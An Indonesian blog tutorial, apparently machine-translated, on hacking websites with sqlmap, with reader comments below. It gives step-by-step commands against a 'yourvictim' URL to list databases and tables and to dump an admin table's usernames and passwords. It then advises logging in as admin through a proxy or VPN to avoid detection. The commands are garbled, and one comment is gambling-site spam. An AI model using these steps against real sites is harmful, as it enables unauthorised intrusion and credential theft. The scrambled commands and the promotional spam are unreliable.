Hack website using backtrack sqlmap

Dalam tutorial sebelumnya saya telah menjelaskan apa yang mundur , sekarang dalam tutorial ini saya akan menunjukkan kepada Anda cara hack website menggunakan Backtrack 5 (sqlmap). Sqlmap adalah sql injection otomatis alat yang membantu Anda untuk hack situs dengan mudah. Ikuti langkah-langkah sederhana untuk hack website menggunakan backtrack 5 alat sqlmap.

1. Buka terminal mundur dan jenis cd / pentest / database / sqlmap dan tekan enter. Sekarang sqlmap terbuka di terminal Anda

2. Sekarang menemukan situs rentan. (Baik saya sudah memiliki situs rentan)

3. Sekarang ketik perintah ini di terminal dan tekan enter. (Lihat di atas gambar)

python sqlmap.py-u http://yourvictim 'menyelinap / index.php id =? 4 -dbs

4. Sekarang Anda akan mendapatkan nama database website

Yah aku punya dua database aj dan information_schema kita akan memilih database aj.

5. Sekarang mendapatkan tabel database tersebut. untuk itu Anda perlu memasukkan perintah ini ke terminal Anda dan hanya tekan Enter.

python sqlmap.py-u slink / index.php http://yourvictim '? id = 4 -D (nama database)-tabel

6. Sekarang kita perlu untuk mengambil tabel dari database aj. paste perintah bawah perintah dan tekan enter.

python sqlmap.py-u http://www.yourvictim 'slink.com / index.php id =? 4 -D aj-tabel

7. Sekarang Anda akan mendapatkan daftar tabel yang disimpan dalam database aj.

8. Sekarang mari kita ambil kolom dari tabel admin

python sqlmap.py-u http://www.yourvictim 'slink.com / index.php id = 4? -T admin - kolom

Sekarang kita punya kolom dan kami mendapat username dan password
9. Sekarang mari kita ambil password admin

python sqlmap.py-u ? slink.com / index.php http://www.yourvictim 'id = 4 -T admin-U test - dump

Sekarang kita punya username dan password dari website!

Sekarang hanya menemukan admin pidana website dan menggunakan proxy / vpn ketika Anda mencoba untuk login di website sebagai admin.

Artikel Terkait

6 komentar

Unknown mengatakan... 24 April 2013 pukul 00.00

Ini bisa kagak gan....^:D

kang udin mengatakan... 14 Januari 2017 pukul 03.21

root@bismillah-X455LAB:/opt/sqlmap# python sqlmap.py-u http://www.yourvictim 'slink.com / index.php id =? 4 -D aja-tabel
> admin
> cms
> galleries
> homepage_images
> magzine
> magzine_details
> testi
> type
> videos
>

kok jadinya gini kang??

Anonim mengatakan... 30 April 2017 pukul 19.32

Langkah-langkah nya salah.

Unknown mengatakan... 3 April 2017 pukul 19.13

yang ga ada parameternya gabisa di hack ya?? misal "http://testing.co.id/"

cindycintani mengatakan... 16 April 2017 pukul 02.07

Mari Bergabung bersama kami di www.danaqq.com Situs BandarQ DominoQQ Poker Online Indonesia dengan minimal depo hanya 10rb saja dan penarikan dana hanya 25rb.Dalam 1 User id dapat memainkan 7 permainan yakni BandarQ , AduQ , Bandar Poker , Poker Online , DominoQQ , Capsa Susun , Sakong Online ( Hits & Terbaru ).

Keunggulana DanaQQ Sebagai Situs BandarQ Online Indonesia adalah server yang aman dari robot maupun admin yang dimana artinya Bermain di Situs bandarq Online Danaqq.com Murni Player vs Player 100%.

Bonus Turn-over 0.5% dibagikan setiap hari tanpa syarat minimal Turnover, Bonus refferal ( rujukan ) 20% dibagikan setiap minggunya.

Bagi agan yang mencintai permainan poker , bandarq , domino99 jangan sungkan untuk bergabung dengan www.danaqq.com.

Contact

Link Alternatif : www.danaqq.info / www.danaqq.net
PHONE : 855968642802
PIN BB : D877B27C
SKYPE : LIVE : DANAQIUQIU_1
YM : CSDANAQQ
FACEBOOK : DANAQQIU

Unknown mengatakan... 7 Juni 2017 pukul 13.08

Penipu ulung saya tidak pernah wd seumur hidup main disini...

Sidoarjo Blackhat